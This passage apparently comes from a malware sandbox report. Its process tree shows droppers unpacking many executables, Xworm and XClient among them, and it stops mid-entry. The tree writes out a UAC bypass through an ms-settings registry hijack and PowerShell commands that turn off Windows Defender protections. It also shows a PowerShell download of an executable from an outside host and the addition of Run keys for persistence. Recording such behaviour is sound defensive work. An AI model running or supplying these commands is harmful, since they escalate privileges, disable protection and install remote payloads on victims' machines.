      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1570.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3860
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\1570.vbs" /f
        5⤵
        Modifies registry class
        
        PID:3044
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:4564
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      PID:3964
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        
        PID:404
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\1570.vbs
        6⤵
        
        PID:1616
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:828
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\1570.vbs
      4⤵
      PID:4292
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:4972
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        Modifies registry class
        
        PID:3108
- - C:\Users\Admin\AppData\Local\Temp\a\filer.exe
    "C:\Users\Admin\AppData\Local\Temp\a\filer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\a\filer.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2108
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2084
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic cpu get Name
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3104
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1544
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:3480
- - C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
    "C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:3804
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4656
- - C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"
    3⤵
    - Executes dropped EXE
    PID:2752
- - C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
    3⤵
    - Executes dropped EXE
    PID:4948
- - C:\Users\Admin\AppData\Local\Temp\a\333.exe
    "C:\Users\Admin\AppData\Local\Temp\a\333.exe"
    3⤵
    - Executes dropped EXE
    PID:4256
- - C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe
    "C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:240
- - C:\Users\Admin\AppData\Local\Temp\a\test12.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test12.exe"
    3⤵
    - Executes dropped EXE
    PID:736
- - C:\Users\Admin\AppData\Local\Temp\a\test6.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test6.exe"
    3⤵
    - Executes dropped EXE
    PID:3144
- - C:\Users\Admin\AppData\Local\Temp\a\test14.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test14.exe"
    3⤵
    - Executes dropped EXE
    PID:4876
- - C:\Users\Admin\AppData\Local\Temp\a\pantest.exe
    "C:\Users\Admin\AppData\Local\Temp\a\pantest.exe"
    3⤵
    - Executes dropped EXE
    PID:1720
- - C:\Users\Admin\AppData\Local\Temp\a\test9.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test9.exe"
    3⤵
    - Executes dropped EXE
    PID:4848
- - C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe"
    3⤵
    - Executes dropped EXE
    PID:5016
- - C:\Users\Admin\AppData\Local\Temp\a\test19.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test19.exe"
    3⤵
    - Executes dropped EXE
    PID:3916
- - C:\Users\Admin\AppData\Local\Temp\a\test10.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test10.exe"
    3⤵
    - Executes dropped EXE
    PID:3392
- - C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe"
    3⤵
    - Executes dropped EXE
    PID:4996
- - C:\Users\Admin\AppData\Local\Temp\a\test23.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test23.exe"
    3⤵
    - Executes dropped EXE
    PID:3424
- - C:\Users\Admin\AppData\Local\Temp\a\test5.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test5.exe"
    3⤵
    - Executes dropped EXE
    PID:484
- - C:\Users\Admin\AppData\Local\Temp\a\test11.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test11.exe"
    3⤵
    - Executes dropped EXE
    PID:4552
- - C:\Users\Admin\AppData\Local\Temp\a\test20.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test20.exe"
    3⤵
    - Executes dropped EXE
    PID:4108
- - C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe"
    3⤵
    - Executes dropped EXE
    PID:3588
- - C:\Users\Admin\AppData\Local\Temp\a\test16.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test16.exe"
    3⤵
    - Executes dropped EXE
    PID:2168
- - C:\Users\Admin\AppData\Local\Temp\a\test13.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test13.exe"
    3⤵
    - Executes dropped EXE
    PID:3616
- - C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe"
    3⤵
    - Executes dropped EXE
    PID:3000
- - C:\Users\Admin\AppData\Local\Temp\a\test15.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test15.exe"
    3⤵
    - Executes dropped EXE
    PID:4872
- - C:\Users\Admin\AppData\Local\Temp\a\test18.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test18.exe"
    3⤵
    - Executes dropped EXE
    PID:4992
- - C:\Users\Admin\AppData\Local\Temp\a\test21.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test21.exe"
    3⤵
    - Executes dropped EXE
    PID:4780
- - C:\Users\Admin\AppData\Local\Temp\a\test22.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test22.exe"
    3⤵
    - Executes dropped EXE
    PID:2112
- - C:\Users\Admin\AppData\Local\Temp\a\test8.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test8.exe"
    3⤵
    - Executes dropped EXE
    PID:5032
- - C:\Users\Admin\AppData\Local\Temp\a\test7.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test7.exe"
    3⤵
    - Executes dropped EXE
    PID:648
- - C:\Users\Admin\AppData\Local\Temp\a\test-again.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test-again.exe"
    3⤵
    - Executes dropped EXE
    PID:2992
- - C:\Users\Admin\AppData\Local\Temp\a\test17.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test17.exe"
    3⤵
    - Executes dropped EXE
    PID:4228
- - C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe
    "C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1648
  - - C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe
      "C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"
      4⤵
      Executes dropped EXE
      PID:2392
- - C:\Users\Admin\AppData\Local\Temp\a\win.exe
    "C:\Users\Admin\AppData\Local\Temp\a\win.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:1780
  - - C:\Windows\SysWOW64\route.exe
      route print
      4⤵
      System Location Discovery: System Language Discovery
      PID:1776
  - - C:\Windows\SysWOW64\arp.exe
      arp -a 10.127.0.1
      4⤵
      Network Service Discovery
      PID:3044
- - C:\Users\Admin\AppData\Local\Temp\a\x4lburt.exe
    "C:\Users\Admin\AppData\Local\Temp\a\x4lburt.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:1416
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:1528
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        
        PID:3408
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        
        PID:3428
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 348
        6⤵
        Program crash
        
        PID:4888
- - C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe
    "C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:4420
- - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
    "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
    3⤵
    - Executes dropped EXE
    PID:3732
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:3632
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:3156
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:688
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:536
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:2944
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:1988
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:540
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:4068
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:3288
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:1476
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:1776
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:4864
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:2692
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:2364
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:5100
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:2332
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:4800
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:3536
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:1540
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:1520
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:3408
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:3744
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:1528
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      PID:3108
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:888
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:4852
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:4824
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:2900
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:1176
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:2808
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:4176
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:1936
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:4124
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:1116
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:4980
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:3148
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5108
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:948
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:1964
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:1352
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:3736
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:3300
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:4688
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:2724
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:2812
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:4568
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:1976
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:4884
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:3004
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:440
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5020
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:4560
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5092
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:3740
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:1588
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:4292
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:4820
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:2860
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:3900
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:2748
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:3924
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:1284
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:2688
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:2676
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:3560
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:4984
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:2988
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5048
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:1232
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:2080
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:4040
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:1484
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:1556
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:2540
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:3880
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:436
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:4972
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5124
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5132
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5140
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5148
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5156
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5164
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5172
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5180
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5188
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5196
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5204
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5212
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5220
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5228
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5236
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5244
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5252
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5260
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5268
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5276
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5284
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5292
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      PID:5300
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
